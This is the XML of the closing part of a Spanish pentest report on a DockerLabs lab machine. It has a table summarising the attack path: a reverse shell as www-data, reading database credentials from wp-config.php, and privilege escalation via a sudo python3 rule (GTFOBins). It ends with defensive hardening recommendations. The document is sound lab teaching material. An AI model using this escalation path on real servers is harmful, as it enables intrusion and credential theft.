            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión recibida en el listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell como www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumeración de /home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag capturada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -l — regla NOPASSWD sobre python3 para bobby</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector de escalada identificado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Lectura de wp-config.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales de BD expuestas (wpuser:wppass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Abuso de GTFOBins (sudo -u bobby python3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell obtenida como bobby</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Conclusiones y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El compromiso total del servidor fue posible debido a una combinación de fallas básicas de configuración y buenas prácticas de seguridad no aplicadas, más que a vulnerabilidades complejas de día cero. Se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Establecer una política de contraseñas robustas para todas las cuentas de WordPress, eliminando credenciales por defecto o triviales como admin:admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deshabilitar o restringir el acceso al endpoint XML-RPC (xmlrpc.php) cuando no sea estrictamente necesario, o protegerlo con autenticación adicional y limitación de intentos (rate limiting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Desactivar el Editor de Archivos de Plugin/Tema integrado en WordPress (DISALLOW_FILE_EDIT en wp-config.php), ya que otorga capacidad de ejecución remota de código a cualquier cuenta con rol de administrador comprometida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Desactivar el listado de directorios en el servidor web para las rutas de temas y plugins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Eliminar la regla sudo NOPASSWD que permite a www-data ejecutar /usr/bin/python3 como el usuario bobby; aplicar el principio de mínimo privilegio y evitar otorgar permisos sudo sobre intérpretes o binarios con capacidad de generar shells (ver GTFOBins).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evitar almacenar credenciales de base de datos en texto plano accesibles por el usuario del servicio web; restringir los permisos de lectura de wp-config.php y, cuando sea posible, usar variables de entorno o mecanismos de gestión de secretos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisar y restringir los permisos del usuario bobby, dado que su compromiso ya es posible desde el propio servicio web; auditar además posibles rutas adicionales de escalada hacia root (binarios SUID, tareas cron, otras reglas sudo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mantener WordPress, sus temas y plugins actualizados, y eliminar plugins no utilizados (como Hello Dolly) que amplían la superficie de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fin del informe.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jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Informe de Pentesting — Máquina Talent (DockerLabs)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0d20f93e62fad5a79c73ca15fc913e9f2c5b0e5.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c4e77f08776ea33923ac3ea025b60a32cb8d1ec7.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4a4c5aa67f4f9fc4a7825e3813ec039d7487abda.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8f9bd7afa95d3ba9bc7594244f47e4950c57f3aa.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e7cb164afaf18397fcc3f4b00a71007a6da34a1b.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3c85271e9a643af424f62ba78b86cdf83eb88c8e.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0443a3f1d6cf0f8f375b4525d00620a6fc8bc634.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6a9343b97a78856f4adeed45096027923e6412ac.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6779604c7c86211690b32719541aaf2998284005.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/af536816fd1eed9735b7349c0367d9fd1064fca9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3d69ed7d76bbdfb40c6f69dfce93c7cd5c1509c5.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0604d9086d92a1d7fa6cb7698b17e4b1fad3bc77.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c391c60abb4313ccfeebe0c7bbb4cdf65d176530.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c325736f17bf9747336863683a6ed9b7ff7c216a.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6f9e76f3e2b8e99fcff3f0f708e86b6aa69aa20d.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/208f4a5b04ce0f56bd66c22cdf66246a9804149a.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e75c9f370ec7c1c5ce4c763364c667e6de757ece.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9c2e01e92b130fda0b57f8f7fe95df99eb422a26.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1e3f74dc7d369e65a5236867c0a32f225111b9da.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e61b39a6a44b0a4da83d206f1dbde18d82179387.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b41d8dc796b10ea9de9040fccf2c213194040a9b.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3aafca8bde30390cebdb127b9b7729e84301d747.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/854c6e9a55ce7ef9cf86fa01d76c6cc3a78cd378.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2026-10-22T07:45:47.802Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-22T07:45:47.810Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>